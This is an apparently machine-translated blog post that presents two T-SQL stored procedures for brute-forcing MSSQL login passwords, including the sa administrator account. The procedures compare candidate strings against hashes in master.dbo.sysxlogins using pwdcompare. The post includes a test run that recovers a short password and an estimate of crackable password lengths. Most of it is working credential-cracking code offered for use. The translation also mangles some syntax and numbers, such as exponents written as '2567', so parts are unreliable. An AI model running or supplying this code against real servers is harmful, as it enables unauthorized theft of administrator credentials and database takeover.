Mssql uses the stored procedure to crack the sa Password

The Code demonstrates brute-force cracking of MSSQL accounts and passwords, including the sa password of the administrator account.

There is a stored procedure for SQL Server Sa password cracking on the Internet. The method is to brute force crack the MSSQL account and password, including the sa password of the administrator account. Below I will slightly modify other codes, and perform some performance analysis.

The core idea of cracking the program is to store the master. dbo. sysxlogins table of the account and password and compare the Stored Procedure pwdcompare with the unpublished password. After analysis by one party, some code has been modified. The code before and after modification is posted below,

A Stored Procedure for SQL Server Sa password cracking
Copy codeThe Code is as follows:
Alter proc p_GetPassword
@ Username sysname = null, -- user name. If this parameter is not specified, all users are listed.
@ Pwdlen int = 2 -- number of digits of the password to be cracked. The default value is 2 or less
As
Set @ pwdlen = case when isnull (@ pwdlen, 0) <1 then 1 else @ pwdlen-1 end
Select top 255 id = identity (int,) into # t from syscolumns
Alter table # t add constraint PK _ # t primary key (id)
Select name, password
, Type = case when xstatus & 2048 = 2048 then 1 else 0 end
, Jm = case when password is null then 1 else 0 end
, Pwdstr = cast (''as sysname)
, Pwd = cast (''as varchar (8000 ))
Into # pwd
From master. dbo. sysxlogins
Where srvid is null
And name = isnull (@ username, name)
Declare @ s1 varchar (8000), @ s2 varchar (8000), @ s3 varchar (8000)
Declare @ l int
Select @ l = 0
, @ S1 = 'Char (aa. id )'
, @ S2 = 'Cast (aa. id as varchar )'
, @ S3 = ', # t aa'
Exec ('
Update pwd set jm = 1, pwdstr = '+ @ s1 +'
, Pwd = '+ @ s2 +'
From # pwd '+ @ s3 +'
Where pwd. jm = 0
And pwdcompare ('+ @ s1 +', pwd. password, pwd. type) = 1
')
While exists (select 1 from # pwd where jm = 0 and @ l <@ pwdlen)
Begin
Select @ l = @ l + 1
, @ S1 = @ s1 + '+ char (@ l/26 + 97) + char (@ l % 26 + 97) +'. id )'
, @ S2 = @ s2 + '+ '','' + cast (' + char (@ l/26 + 97) + char (@ l % 26 + 97) + '. id as varchar )'
, @ S3 = @ s3 + ', # t' + char (@ l/26 + 97) + char (@ l % 26 + 97)
Exec ('
Update pwd set jm = 1, pwdstr = '+ @ s1 +'
, Pwd = '+ @ s2 +'
From # pwd '+ @ s3 +'
Where pwd. jm = 0
And pwdcompare ('+ @ s1 +', pwd. password, pwd. type) = 1
')
End
Select username = name, password = pwdstr, password ASCII = pwd
From # pwd
GO

The modified code is as follows:
Copy codeThe Code is as follows:
Alter proc p_GetPassword2
@ Username sysname = null, -- user name. If this parameter is not specified, all users are listed.
@ Pwdlen int = 2 -- number of digits of the password to be cracked. The default value is 2 or less
As
Set nocount on

If object_id (N 'tempdb .. # t') is not null
Drop table # t
If object_id (N 'tempdb .. # pwd') is not null
Drop table # pwd

Set @ pwdlen = case when isnull (@ pwdlen, 0) <1 then 1 else @ pwdlen-1 end

Declare @ ss varchar (256)
-- Select @ ss = '20140901'
Select @ ss = 'abcdefghijklmnopqrstuvwxy'
Select @ ss = @ ss + ''0123456789-= [] \;,./'
Select @ ss = @ ss + '~! @ # $ % ^ & * () _ + {}|:<>? '
-- Select @ ss = @ ss + 'abcdefghijklmnopqrstuvwxy'

Create table # t (c char (1) not null)
Alter table # t add constraint PK _ # t primary key CLUSTERED (c)
Declare @ index int
Select @ index = 1
While (@ index <= len (@ ss ))
Begin
Insert # t select SUBSTRING (@ ss, @ index, 1)
Select @ index = @ index + 1
End

Select name, password
, Type = case when xstatus & 2048 = 2048 then 1 else 0 end
, Jm = case when password is null then 1 else 0 end
, Pwdstr = cast (''as sysname)
, Pwd = cast (''as varchar (8000 ))
, Times = cast (''as varchar (8000 ))
Into # pwd
From master. dbo. sysxlogins
Where srvid is null
And name = isnull (@ username, name)
Declare @ s1 varchar (8000), @ s2 varchar (8000), @ s3 varchar (8000), @ stimes varchar (8000)

Declare @ l int, @ t bigint

Select @ t = count (1) * POWER (len (@ ss), 1) from # pwd

Select @ l = 0
, @ S1 = 'aa. c'
, @ S2 = 'Cast (ASCII (aa. c) as varchar )'
, @ S3 = ', # t aa'
, @ Stimes = '1th, '+ cast (@ t as varchar (20) + 'rows'

Exec ('
Update pwd set jm = 1, pwdstr = '+ @ s1 +'
, Pwd = '+ @ s2 +'
From # pwd '+ @ s3 +'
Where pwd. jm = 0
And pwdcompare ('+ @ s1 +', pwd. password, pwd. type) = 1
')
While exists (select 1 from # pwd where jm = 0 and @ l <@ pwdlen)
Begin
Select @ l = @ l + 1
Select @ t = count (1) * POWER (len (@ ss), @ l + 1) from # pwd
Print @ t

Select
@ S1 = @ s1 + '+ char (@ l/26 + 97) + char (@ l % 26 + 97) +'. c'
, @ S2 = @ s2 + '+ '','' + cast (ASCII (' + char (@ l/26 + 97) + char (@ l % 26 + 97) + '. c) as varchar )'
, @ S3 = @ s3 + ', # t' + char (@ l/26 + 97) + char (@ l % 26 + 97)
, @ Stimes = @ stimes + ';' + cast (@ l + 1 as varchar (1) + 'th, '+ cast (@ t as varchar (20 )) + 'rows'

Exec ('
Update pwd set jm = 1, pwdstr = '+ @ s1 +'
, Pwd = '+ @ s2 +'
, Times = ''' + @ stimes + '''
From # pwd '+ @ s3 +'
Where pwd. jm = 0
And pwdcompare ('+ @ s1 +', pwd. password, pwd. type) = 1
')
End
Select username = name, password = pwdstr, password ASCII = pwd, number of queries and number of lines = times
From # pwd

If object_id (N 'tempdb .. # t') is not null
Drop table # t
If object_id (N 'tempdb .. # pwd') is not null
Drop table # pwd

My tests are as follows:
Copy codeThe Code is as follows:
P_GetPassword2 'B', 6

Username and password ASCII query times and number of lines
B 123 4356, 50, 51 1th, 66 rows; 2th, 287496 rows; 3th, rows
 

Performance analysis:

In this example, the maximum number of records that can be queried for a bigint type is 9223372036854775807, which is used as the maximum host performance to roughly calculate the cracking performance.

The password length, cracking time, and performance consumption of an account are based on the length of all characters used for cracking and exponential functions with the password length as the index, namely: number of Cracked Accounts * (number of all characters used for cracking) Maximum password length to the power <maximum host performance:

The original stored procedure uses 256 characters to crack. Theoretically, it can crack a 7-bit password, that is, 2567 <Max (bigint ).
The stored procedure I modified uses 66 General keyboard characters. In theory, I can crack the 10-bit password, that is, 6610 <Max (bigint ).
If you know that the password is a combination of 10 digits, you can theoretically crack the 19-bit password, that is, 1019 <Max (bigint ).